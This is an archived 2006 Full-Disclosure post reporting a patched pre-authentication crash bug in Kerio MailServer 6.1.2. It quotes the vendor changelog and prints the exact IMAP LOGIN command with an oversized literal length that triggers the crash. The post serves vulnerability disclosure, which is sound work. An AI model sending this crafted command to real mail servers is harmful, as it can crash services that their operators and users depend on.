Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11792
HistoryMar 13, 2006 - 12:00 a.m.

[Full-disclosure] Kerio MailServer bugfun

2006-03-1300:00:00
vulners.com
12

Hi,

It should be noted that ProtoVer Sample IMAP testsuite has been released
with 3 unpublished bugs.

Now it looks like that Kerio MailServer preauth bug has been fixed.

Kerio MailServer 6.1.3 changelog:
"""
Version 6.1.3 Patch 1 - March 9, 2006

  • Fixed possible crash when handling special crafted IMAP LOGIN command.
    """

The bug itself is really simple:
$ ls PROTOVER_SAMPLE_IMAP-1.0/audit/
iaemailserver-5.3.4 keriomailserver-6.1.2 merak-8.3.0
$ cat PROTOVER_SAMPLE_IMAP-1.0/audit/keriomailserver-6.1.2
a001 LOGIN {4294967294}
LITERAL TOKEN
a002 LOGOUT

Regards,
Evgeny Legerov
www.gleg.net


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/